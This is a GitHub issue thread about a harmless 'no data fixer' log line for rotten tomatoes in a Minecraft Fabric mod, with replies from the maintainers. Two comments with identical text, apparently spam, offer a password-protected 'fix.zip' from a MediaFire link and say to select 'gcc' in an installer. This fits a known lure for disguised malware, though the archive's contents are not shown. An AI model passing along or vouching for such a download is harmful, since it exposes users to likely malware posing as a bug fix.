### ISSUE TITLE
no data fixer rotten tomatoes

### ISSUE THREAD

**Issue by Omarforce** [MehVahdJukaar/FarmersDelightRefabricated#70]
### Minecraft version

1.21

### Farmer's Delight version

2.1.6

### Fabric Loader version

16.1

### Fabric API version

0.102.1

### Description

no data fixer for rotten tomatoes error on server boot

### Mod list

![Screenshot 2024-08-26 122231](https://github.com/user-attachments/assets/2a215f51-1add-4c8a-b429-e9046467e817)
![Screenshot 2024-08-26 122231](https://github.com/user-attachments/assets/85154710-70c4-4756-8da1-027c91d64551)

### Minimal instance

- [ ] I have tested this on a minimal instance

### Performance and shader mods

- [X] I am using performance or shader mods

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MehVahdJukaar** [comment]
does server crash? not boot? if so send latest.log
otherwise this is a harmless log line

**Comment by ChrysanthCow** [comment]
It is a harmless log line, I'll fix it next time I update, but it isn't a priority.
